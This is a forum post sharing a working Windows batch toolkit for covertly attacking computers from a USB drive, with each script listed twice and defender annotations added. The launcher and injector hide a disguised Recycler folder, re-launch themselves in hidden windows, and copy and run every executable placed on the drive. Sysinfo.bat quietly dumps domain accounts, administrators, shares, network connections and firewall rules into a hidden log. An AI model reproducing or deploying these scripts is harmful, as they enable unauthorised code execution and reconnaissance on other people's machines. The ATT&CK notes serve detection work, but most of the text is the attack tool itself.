I have seen many different attempts at creating a USB hacking tool. The Switchblade and Hacksaw were okay, but they would set off many alarms, making them useless.
Code:
:: Launcher: runs only from a non-system drive, stages injector.bat and sysinfo.bat into a
:: hidden folder on that drive, then starts them.
:: Defender note: the staging folder is named to resemble a Recycle Bin SID directory. A
:: hidden+system "Recycler" tree holding .bat or .vbs files on removable media is a useful
:: hunting indicator (ATT&CK T1564.001, Hidden Files and Directories).
@(echo off & break off & Title _) >nul
:: Stop immediately when the script's own drive is the system drive.
If %~d0 == %systemdrive% goto :EOF
::First Run
:: The staging path is root-relative, so it resolves on whichever drive is current.
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
:: Set the system and hidden attributes on the Recycler tree, folders included.
Attrib +s +h Recycler /d /s
:Next
:: Copy each payload script into the staging folder, then delete the copy at the drive root.
if exist injector.bat copy /y injector.bat %wrkdir% >nul && del /f /q %~d0\injector.bat >nul
if exist sysinfo.bat copy /y sysinfo.bat %wrkdir% >nul && del /f /q %~d0\sysinfo.bat >nul
:: Delete inject.vbs and sysinfo.vbs from the drive root when a file of that name exists
:: in the current directory.
if exist inject.vbs del /f /q %~d0\inject.vbs >nul
if exist sysinfo.vbs del /f /q %~d0\sysinfo.vbs >nul
CD %wrkdir%>nul
:: Start the injector: an existing inject.vbs is used first, otherwise injector.bat.
If exist inject.vbs Start "" inject.vbs>nul & Goto Next1
If exist injector.bat Start "" injector.bat >nul
:Next1
:: Same for the inventory script; sysinfo.bat is run with Call when no sysinfo.vbs exists.
If exist sysinfo.vbs Start "" sysinfo.vbs >nul & Goto Next2
Call sysinfo.bat
:Next2
:: Set the system and hidden attributes on the launcher file itself.
attrib +s +h %0
cls
exit
:: Second printing of the launcher listing; the page repeats it without the opening
:: echo-off line. It stages injector.bat and sysinfo.bat into a hidden folder on a
:: non-system drive and starts them.
:: Defender note: a hidden+system "Recycler" tree holding .bat or .vbs files on removable
:: media is a useful hunting indicator (ATT&CK T1564.001, Hidden Files and Directories).
:: Stop immediately when the script's own drive is the system drive.
If %~d0 == %systemdrive% goto :EOF
::First Run
:: The staging path is root-relative, so it resolves on whichever drive is current.
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
:: Set the system and hidden attributes on the Recycler tree, folders included.
Attrib +s +h Recycler /d /s
:Next
:: Copy each payload script into the staging folder, then delete the copy at the drive root.
if exist injector.bat copy /y injector.bat %wrkdir% >nul && del /f /q %~d0\injector.bat >nul
if exist sysinfo.bat copy /y sysinfo.bat %wrkdir% >nul && del /f /q %~d0\sysinfo.bat >nul
:: Delete inject.vbs and sysinfo.vbs from the drive root when a file of that name exists
:: in the current directory.
if exist inject.vbs del /f /q %~d0\inject.vbs >nul
if exist sysinfo.vbs del /f /q %~d0\sysinfo.vbs >nul
CD %wrkdir%>nul
:: Start the injector: an existing inject.vbs is used first, otherwise injector.bat.
If exist inject.vbs Start "" inject.vbs>nul & Goto Next1
If exist injector.bat Start "" injector.bat >nul
:Next1
:: Same for the inventory script; sysinfo.bat is run with Call when no sysinfo.vbs exists.
If exist sysinfo.vbs Start "" sysinfo.vbs >nul & Goto Next2
Call sysinfo.bat
:Next2
:: Set the system and hidden attributes on the launcher file itself.
attrib +s +h %0
cls
exit
::__Injector.bat__::
Code:
:: Injector.bat: re-launches itself in a hidden window through a generated inject.vbs, then
:: copies every .exe, .bat and .vbs from the hidden BIN folder on the drive into a folder
:: under the user's TEMP directory and starts each copy.
:: Defender note: indicators visible in this listing are wscript.exe running a two-line
:: inject.vbs, a "MessengerCache" folder under TEMP, and programs started from that folder
:: right after removable media is attached. Application control that blocks execution from
:: removable drives and from TEMP addresses this pattern (ATT&CK T1059.003, T1059.005).
@(echo off & break off & Title _) >nul
::-----------------------------------------------------------------------------------------------------------------------------::
::This is called the Injector
:: This script is meant to only run from flash drive
:: On first run, it makes the %wrkdir% on your flashdrive as a place to hide files
:: I used recycler\S-15~ ect to make it look not obvious as a hidden system folder
:: Any executable files place in the "Bin" folder will be copied to %temp% and executed, exe, bat, and vbs
:: It have put 10-15 files in there at once and it copies and executes them all in about 10 seconds
::Very handy if you have things that inject into memory, that will otherwise cause virtual memory errors if they are executed from USB.
::It's nice because you don't need to know filenames and edit script all of the time it executes everything
::If you make your scripts self destruct that would be good if they only need to run once
:: I have another script that logs pc, system and network, open ports, history, info etc, using only windows tools
:: It gets called by another script along with this one, and saves to "\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
::When this script is complete it brings up the safely remove hardware menu to signify completion for drive ejection.
::--------------------------------------------------------------------------------------------------------------------------------::
::--------------------------------------------------------------------------------------------------------------------------------::
@echo off & @break off & title _
:: Dispatch: when an argument is given, jump to the label of that name; with no argument
:: the script calls itself again with "system".
if not [%1]==[] goto :%1
call %0 system
exit
:system
:: Write inject.vbs, which uses WScript.Shell to run this same script with the "script"
:: argument in a hidden window (vbhide) and waits for it, then start the .vbs.
if exist inject.vbs start "" "inject.vbs"
echo set o = createobject("wscript.shell") > inject.vbs
echo o.run "%~0 script", vbhide, true >> inject.vbs
start "" "inject.vbs"
exit
:script
:: Stop when the script's own drive is the system drive.
If %~d0 == %systemdrive% goto :EOF
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\BIN"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
:: First run only: create the BIN folder, set system and hidden attributes, and stop.
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
Goto :EOF
:Next
::Non obvious directory creation on PC
If not exist "%temp%\MessengerCache" mkdir "%temp%\MessengerCache" >nul
:: Each check copies one file type from the current folder into MessengerCache and jumps
:: to the matching launch step; the launch step then jumps to the next check.
:ExeCheck
If exist "*exe" copy /y "*.exe" "%temp%\MessengerCache" & Goto EXEGooD
:BatCheck
If exist "*bat" copy /y "*bat" "%temp%\MessengerCache" & Goto BatGood
:VbsCheck
If exist "*vbs" copy /y "*vbs" "%temp%\MessengerCache" & Goto VbsGood
Goto :eof
:EXEGooD
:: Start every .exe found in MessengerCache.
For %%j IN ("%temp%\MessengerCache\*.Exe") DO Start "" %%j
Goto BatCheck
:BatGood
:: Start every .bat found in MessengerCache.
For %%h IN ("%temp%\MessengerCache\*.Bat") DO Start "" %%h
Goto VbsCheck
:VbsGood
:: Start every .vbs found in MessengerCache, then delete the generated inject.vbs.
For %%i IN ("%temp%\MessengerCache\*.Vbs") DO Start "" %%i
Del /F /Q inject.vbs >nul
@cls & @Exit
:: Second printing of the Injector.bat listing; the page repeats it without the opening
:: echo-off line. The script re-launches itself hidden through a generated inject.vbs, then
:: copies every .exe, .bat and .vbs from the hidden BIN folder into a folder under TEMP and
:: starts each copy.
:: Defender note: indicators visible in this listing are wscript.exe running a two-line
:: inject.vbs, a "MessengerCache" folder under TEMP, and programs started from that folder
:: right after removable media is attached (ATT&CK T1059.003, T1059.005).
::-----------------------------------------------------------------------------------------------------------------------------::
::This is called the Injector
:: This script is meant to only run from flash drive
:: On first run, it makes the %wrkdir% on your flashdrive as a place to hide files
:: I used recycler\S-15~ ect to make it look not obvious as a hidden system folder
:: Any executable files place in the "Bin" folder will be copied to %temp% and executed, exe, bat, and vbs
:: It have put 10-15 files in there at once and it copies and executes them all in about 10 seconds
::Very handy if you have things that inject into memory, that will otherwise cause virtual memory errors if they are executed from USB.
::It's nice because you don't need to know filenames and edit script all of the time it executes everything
::If you make your scripts self destruct that would be good if they only need to run once
:: I have another script that logs pc, system and network, open ports, history, info etc, using only windows tools
:: It gets called by another script along with this one, and saves to "\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
::When this script is complete it brings up the safely remove hardware menu to signify completion for drive ejection.
::--------------------------------------------------------------------------------------------------------------------------------::
::--------------------------------------------------------------------------------------------------------------------------------::
@echo off & @break off & title _
:: Dispatch: when an argument is given, jump to the label of that name; with no argument
:: the script calls itself again with "system".
if not [%1]==[] goto :%1
call %0 system
exit
:system
:: Write inject.vbs, which uses WScript.Shell to run this same script with the "script"
:: argument in a hidden window (vbhide) and waits for it, then start the .vbs.
if exist inject.vbs start "" "inject.vbs"
echo set o = createobject("wscript.shell") > inject.vbs
echo o.run "%~0 script", vbhide, true >> inject.vbs
start "" "inject.vbs"
exit
:script
:: Stop when the script's own drive is the system drive.
If %~d0 == %systemdrive% goto :EOF
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\BIN"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
:: First run only: create the BIN folder, set system and hidden attributes, and stop.
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
Goto :EOF
:Next
::Non obvious directory creation on PC
If not exist "%temp%\MessengerCache" mkdir "%temp%\MessengerCache" >nul
:: Each check copies one file type from the current folder into MessengerCache and jumps
:: to the matching launch step; the launch step then jumps to the next check.
:ExeCheck
If exist "*exe" copy /y "*.exe" "%temp%\MessengerCache" & Goto EXEGooD
:BatCheck
If exist "*bat" copy /y "*bat" "%temp%\MessengerCache" & Goto BatGood
:VbsCheck
If exist "*vbs" copy /y "*vbs" "%temp%\MessengerCache" & Goto VbsGood
Goto :eof
:EXEGooD
:: Start every .exe found in MessengerCache.
For %%j IN ("%temp%\MessengerCache\*.Exe") DO Start "" %%j
Goto BatCheck
:BatGood
:: Start every .bat found in MessengerCache.
For %%h IN ("%temp%\MessengerCache\*.Bat") DO Start "" %%h
Goto VbsCheck
:VbsGood
:: Start every .vbs found in MessengerCache, then delete the generated inject.vbs.
For %%i IN ("%temp%\MessengerCache\*.Vbs") DO Start "" %%i
Del /F /Q inject.vbs >nul
@cls & @Exit
::__Sysinfo.bat__::
Code:
:: Sysinfo.bat: re-launches itself hidden through a generated sysinfo.vbs, then writes a
:: host and network inventory to a text file in the hidden Docs folder.
:: Defender note: every command below is a built-in Windows tool, so file reputation will
:: not flag it. The behavioural signal is one command shell, typically a child of
:: wscript.exe, spawning net, netstat, tasklist, systeminfo, netsh, ipconfig and arp in a
:: short burst (ATT&CK discovery techniques such as T1082, T1016, T1049, T1057, T1087).
@echo off & @break off & title _
:: Dispatch: when an argument is given, jump to the label of that name; with no argument
:: the script calls itself again with "system".
if not [%1]==[] goto :%1
call %0 system
exit
:system
:: Write sysinfo.vbs, which uses WScript.Shell to run this same script with the "script"
:: argument in a hidden window (vbhide) and waits for it, then start the .vbs.
if exist sysinfo.vbs start "" "sysinfo.vbs"
echo set o = createobject("wscript.shell") > sysinfo.vbs
echo o.run "%~0 script", vbhide, true >> sysinfo.vbs
start "" "sysinfo.vbs"
exit
:script
:: Output folder, root-relative; unlike the other two scripts there is no system-drive check here.
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
:: Set system and hidden attributes on the Recycler tree and on .txt files under Recycler.
Attrib +s +h Recycler /d /s && Attrib +s +h Recycler\*.txt
:Next
CD %wrkdir%>nul
:: The log file name is built from the computer name and a random number.
set logfile=%wrkdir%\%computername%-%random%.txt 2>&1
::@@System_Info and Log Creation@@::
Echo ************************************ >> %logfile%
Echo ***********[System Info]************ >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %logfile%
time /t >> %logfile%
date /t >> %logfile%
Echo *********************************************** >> %logfile%
Echo ***********[External / Internal Ip]************ >> %logfile%
Echo *********************************************** >> %logfile%
::This script for external ip was not written by me, got it from spam::
:: The echo lines below build wan.vbs one line at a time. The generated script requests
:: the URL with Microsoft.XMLHTTP and writes the response text to 00001.tmp.
:: Defender note: an outbound HTTP request to an IP-lookup service made by the script
:: host is a network-side indicator for this step.
echo Function MyIP_XMLHTTP( )>wan.vbs
echo Dim objRequest, strURL >>wan.vbs
echo MyIP_XMLHTTP = "0.0.0.0" >>wan.vbs
echo strURL = "http://www.whatismyip.com/automation/n09230945.asp" >>wan.vbs
echo Set objRequest = CreateObject( "Microsoft.XMLHTTP" ) >>wan.vbs
echo objRequest.open "GET", strURL, False >>wan.vbs
echo objRequest.send vbNull >>wan.vbs
echo If objRequest.status = 200 Then MyIP_XMLHTTP = objRequest.responseText >>wan.vbs
echo Set objRequest = Nothing >>wan.vbs
echo End Function >>wan.vbs
echo ret = MyIP_XMLHTTP( ) >>wan.vbs
echo Set FSys = CreateObject("Scripting.FileSystemObject") >>wan.vbs
echo Set MonFic = FSys.CreateTextFile("00001.tmp") >>wan.vbs
echo With MonFic >>wan.vbs
echo .writeLine ret >>wan.vbs
echo End With >>wan.vbs
call wan.vbs
::---------------------
:: Read the response into wanIP, then delete the generated script and its output file.
for /F "tokens=* delims=" %%a in (00001.tmp) do set wanIP=%%a
del /F /Q wan.vbs >NUL
del /F /Q 00001.tmp >NUL
::---------------------
:: Take the text after the colon on the ipconfig "IPv4" line as lanIP.
ipconfig |find "IPv4" > 00002.tmp
for /f "tokens=2 delims=:" %%a in (00002.tmp) do set lanIP=%%a
del /F /Q 00002.tmp >NUL
::---------------------
:: Query the UILanguages registry key and keep 5 characters at offset 68 of the last
:: output line as the language value.
for /F "tokens=* delims=" %%i in ('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages"') do set lang=%%i
set lang=%lang:~68,5%
::---------------------
cls
echo. >> %logfile%
echo ^>^>^> Local IP:%lanIP% >> %logfile%
echo ^>^>^> Internet IP: %wanIP% >> %logfile%
echo ^>^>^> Localisation: %lang% >> %logfile%
Echo. >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Network Info]*********** >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Network Info
:: Domain-scoped queries: users, groups, local groups, administrators, Account Operators,
:: account policy, and the domains and hosts visible to net view.
net user /domain >> %logfile%
net group /domain >> %logfile%
net localgroup /domain >> %logfile%
net localgroup administrators /domain >> %logfile%
net localgroup "Account Operators" /domain >> %logfile%
net accounts /domain >> %logfile%
net view /domain >> %logfile%
net view >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Local Info]************* >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Local Info
:: Host-scoped queries: interface and DNS cache data, connections, ARP table, processes
:: and services, shares and mapped drives, account policy, local groups, system summary,
:: and firewall configuration.
ipconfig /all >> %logfile%
ipconfig /displaydns >> %logfile%
netstat -ano >> %logfile%
netstat >> %logfile%
arp -a >> %logfile%
tasklist /svc >> %logfile%
tasklist >> %logfile%
tasklist /v >> %logfile%
net share >> %logfile%
net use >> %logfile%
net accounts >> %logfile%
net localgroup >> %logfile%
net localgroup administrators >> %logfile%
systeminfo >> %logfile%
netsh firewall show config >> %logfile%
netsh advfirewall show allprofiles >> %logfile%
netsh advfirewall firewall show rule name=all >> %logfile%
netsh diag show all /v >> %logfile%
netsh diag /v >> %logfile%
ping localhost >> %logfile%
echo Completed Data Recovery on %time% %date% >> %logfile%
::@@Eject Drive to Signify Completion@@::
:: Opens the hotplug.dll control panel dialog through rundll32; the author uses it as the
:: signal that the run has finished.
setlocal enableextensions
rundll32.exe shell32.dll,Control_RunDLL hotplug.dll
endlocal
:END
::Cleanup
:: NOTE(review): the ping looks like it is meant as a short pause before cleanup; confirm.
ping localhost -n 1>nul
:: Delete the generated sysinfo.vbs.
Del /F /Q sysinfo.vbs >nul
@cls
@exit
:: Second printing of the Sysinfo.bat listing; the page repeats it without the opening
:: echo-off line. The script re-launches itself hidden through a generated sysinfo.vbs,
:: then writes a host and network inventory to a text file in the hidden Docs folder.
:: Defender note: every command below is a built-in Windows tool. The behavioural signal is
:: one command shell, typically a child of wscript.exe, spawning net, netstat, tasklist,
:: systeminfo, netsh, ipconfig and arp in a short burst (ATT&CK discovery techniques such
:: as T1082, T1016, T1049, T1057, T1087).
:: Dispatch: when an argument is given, jump to the label of that name; with no argument
:: the script calls itself again with "system".
if not [%1]==[] goto :%1
call %0 system
exit
:system
:: Write sysinfo.vbs, which uses WScript.Shell to run this same script with the "script"
:: argument in a hidden window (vbhide) and waits for it, then start the .vbs.
if exist sysinfo.vbs start "" "sysinfo.vbs"
echo set o = createobject("wscript.shell") > sysinfo.vbs
echo o.run "%~0 script", vbhide, true >> sysinfo.vbs
start "" "sysinfo.vbs"
exit
:script
:: Output folder, root-relative; unlike the other two scripts there is no system-drive check here.
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
:: Set system and hidden attributes on the Recycler tree and on .txt files under Recycler.
Attrib +s +h Recycler /d /s && Attrib +s +h Recycler\*.txt
:Next
CD %wrkdir%>nul
:: The log file name is built from the computer name and a random number.
set logfile=%wrkdir%\%computername%-%random%.txt 2>&1
::@@System_Info and Log Creation@@::
Echo ************************************ >> %logfile%
Echo ***********[System Info]************ >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %logfile%
time /t >> %logfile%
date /t >> %logfile%
Echo *********************************************** >> %logfile%
Echo ***********[External / Internal Ip]************ >> %logfile%
Echo *********************************************** >> %logfile%
::This script for external ip was not written by me, got it from spam::
:: The echo lines below build wan.vbs one line at a time. The generated script requests
:: the URL with Microsoft.XMLHTTP and writes the response text to 00001.tmp.
:: Defender note: an outbound HTTP request to an IP-lookup service made by the script
:: host is a network-side indicator for this step.
echo Function MyIP_XMLHTTP( )>wan.vbs
echo Dim objRequest, strURL >>wan.vbs
echo MyIP_XMLHTTP = "0.0.0.0" >>wan.vbs
echo strURL = "http://www.whatismyip.com/automation/n09230945.asp" >>wan.vbs
echo Set objRequest = CreateObject( "Microsoft.XMLHTTP" ) >>wan.vbs
echo objRequest.open "GET", strURL, False >>wan.vbs
echo objRequest.send vbNull >>wan.vbs
echo If objRequest.status = 200 Then MyIP_XMLHTTP = objRequest.responseText >>wan.vbs
echo Set objRequest = Nothing >>wan.vbs
echo End Function >>wan.vbs
echo ret = MyIP_XMLHTTP( ) >>wan.vbs
echo Set FSys = CreateObject("Scripting.FileSystemObject") >>wan.vbs
echo Set MonFic = FSys.CreateTextFile("00001.tmp") >>wan.vbs
echo With MonFic >>wan.vbs
echo .writeLine ret >>wan.vbs
echo End With >>wan.vbs
call wan.vbs
::---------------------
:: Read the response into wanIP, then delete the generated script and its output file.
for /F "tokens=* delims=" %%a in (00001.tmp) do set wanIP=%%a
del /F /Q wan.vbs >NUL
del /F /Q 00001.tmp >NUL
::---------------------
:: Take the text after the colon on the ipconfig "IPv4" line as lanIP.
ipconfig |find "IPv4" > 00002.tmp
for /f "tokens=2 delims=:" %%a in (00002.tmp) do set lanIP=%%a
del /F /Q 00002.tmp >NUL
::---------------------
:: Query the UILanguages registry key and keep 5 characters at offset 68 of the last
:: output line as the language value.
for /F "tokens=* delims=" %%i in ('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages"') do set lang=%%i
set lang=%lang:~68,5%
::---------------------
cls
echo. >> %logfile%
echo ^>^>^> Local IP:%lanIP% >> %logfile%
echo ^>^>^> Internet IP: %wanIP% >> %logfile%
echo ^>^>^> Localisation: %lang% >> %logfile%
Echo. >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Network Info]*********** >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Network Info
:: Domain-scoped queries: users, groups, local groups, administrators, Account Operators,
:: account policy, and the domains and hosts visible to net view.
net user /domain >> %logfile%
net group /domain >> %logfile%
net localgroup /domain >> %logfile%
net localgroup administrators /domain >> %logfile%
net localgroup "Account Operators" /domain >> %logfile%
net accounts /domain >> %logfile%
net view /domain >> %logfile%
net view >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Local Info]************* >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Local Info
:: Host-scoped queries: interface and DNS cache data, connections, ARP table, processes
:: and services, shares and mapped drives, account policy, local groups, system summary,
:: and firewall configuration.
ipconfig /all >> %logfile%
ipconfig /displaydns >> %logfile%
netstat -ano >> %logfile%
netstat >> %logfile%
arp -a >> %logfile%
tasklist /svc >> %logfile%
tasklist >> %logfile%
tasklist /v >> %logfile%
net share >> %logfile%
net use >> %logfile%
net accounts >> %logfile%
net localgroup >> %logfile%
net localgroup administrators >> %logfile%
systeminfo >> %logfile%
netsh firewall show config >> %logfile%
netsh advfirewall show allprofiles >> %logfile%
netsh advfirewall firewall show rule name=all >> %logfile%
netsh diag show all /v >> %logfile%
netsh diag /v >> %logfile%
ping localhost >> %logfile%
echo Completed Data Recovery on %time% %date% >> %logfile%
::@@Eject Drive to Signify Completion@@::
:: Opens the hotplug.dll control panel dialog through rundll32; the author uses it as the
:: signal that the run has finished.
setlocal enableextensions
rundll32.exe shell32.dll,Control_RunDLL hotplug.dll
endlocal
:END
::Cleanup
:: NOTE(review): the ping looks like it is meant as a short pause before cleanup; confirm.
ping localhost -n 1>nul
:: Delete the generated sysinfo.vbs.
Del /F /Q sysinfo.vbs >nul
@cls
@exit